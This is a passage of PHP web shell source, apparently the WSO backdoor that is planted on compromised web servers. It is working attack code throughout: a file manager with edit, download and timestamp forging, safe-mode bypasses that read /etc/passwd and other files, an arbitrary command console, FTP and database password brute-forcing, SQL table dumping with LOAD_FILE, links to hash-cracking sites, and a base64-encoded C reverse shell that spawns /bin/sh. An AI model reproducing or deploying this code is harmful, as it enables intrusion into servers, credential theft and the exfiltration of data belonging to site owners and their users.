onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = $links = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $links[] = array_merge($tmp, array('type' => 'link')); elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $ { if($GLOBALS['sort'][0] != 'size') return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); usort($links, "cmp"); $files = array_merge($dirs, $links, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } ?> <tr><td colspan=7> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr> </form></table></div> <?php printFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); if(function_exists($_POST['p1'])) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } printHeader(); echo '<h1>String conversions</h1><div class=content>'; $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(function_exists($_POST['p1'])) echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div>"; ?> <br><h1>Search for hash:</h1><div class=content> <form method='post' target='_blank' name="hf"> <input type="text" name="hash" style="width:200px;"><br> <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br> <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br> <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br> <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br> <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> </form> </div> <?php printFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: ".$type); } $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { } exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } printHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); $gid = @posix_getgrgid(@fileowner($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; else die('<script>g(null,null,null,null,"")</script>'); } echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { @file_put_contents($_POST['p1'],$_POST['p3']); echo 'Saved!<br><script>document.mf.p3.value="";</script>'; } echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(@touch($_POST['p1'],$time,$time)) die('<script>g(null,null,null,null,"")</script>'); else { echo 'Fail!<script>document.mf.p3.value="";</script>'; } } else echo 'Bad time format!<script>document.mf.p3.value="";</script>'; } echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; case 'mkfile': break; } echo '</div>'; printFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); printHeader(); echo '<h1>Safe mode bypass</h1><div class=content>'; echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; printFooter(); } function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } printHeader(); ?> <script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(""); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(""); cur = cmds.length-1; } </script> <?php echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">'; echo '</form></div><script>document.cf.cmd.focus();</script>'; printFooter(); } function actionLogout() { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo 'bye!'; } function actionSelfRemove() { printHeader(); if($_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed'); else echo 'unlink error!'; } echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; printFooter(); } function actionBruteforce() { printHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="komsen"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; printFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->res = @mysql_list_dbs($this->link); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error($this->link); break; case 'pgsql': return @pg_last_error($this->link); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'mysql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function dump($table) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); echo $create[1].";\n\n"; $this->query('SELECT * FROM `'.$table.'`'); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; } break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { ob_start("ob_gzhandler", 4096); $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } printHeader(); ?> <h1>Sql browser</h1><div class=content> <form name="sf" method="post"> <table cellpadding="2" cellspacing="0"> <tr> <td>Type</td> <td>Host</td> <td>Login</td> <td>Password</td> <td>Database</td> <td></td> </tr> <tr> <input type=hidden name=a value=Sql> <input type=hidden name=p1 value='query'> <input type=hidden name=p2> <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'> <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> <td> <select name='type'> <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option> <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option> </select></td> <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td> <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td> <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td> <td> <?php $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($item = $db->fetch()) { list($key, $value) = each($item); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; ?></td> <td><input type=submit value=">>"></td> </tr> </table> <script> function st(t,l) { document.sf.p1.value = 'select'; document.sf.p2.value = t; if(l!=null)document.sf.p3.value = l; document.sf.submit(); } function is() { for(i=0;i<document.sf.elements['tbl[]'].length;++i) document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked; } </script> <?php if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); $num = $db->fetch(); $num = $num['n']; echo "<span>".$_POST['p2']."</span> ($num) "; for($i=0;$i<($num/30);$i++) if($i != (int)$_POST['p3']) echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> "; else echo ($i+1)," "; if($_POST['type']=='pgsql') $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { $db->query(@$_POST['p3']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=0 cellpadding=2 class=main>'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($item as $key => $value) echo '<th>'.$key.'</th>'; reset($item); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; if(@$_POST['p1'] == 'loadfile') { $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); $file = $db->fetch(); echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } echo '</div>'; printFooter(); } function actionNetwork() { printHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; 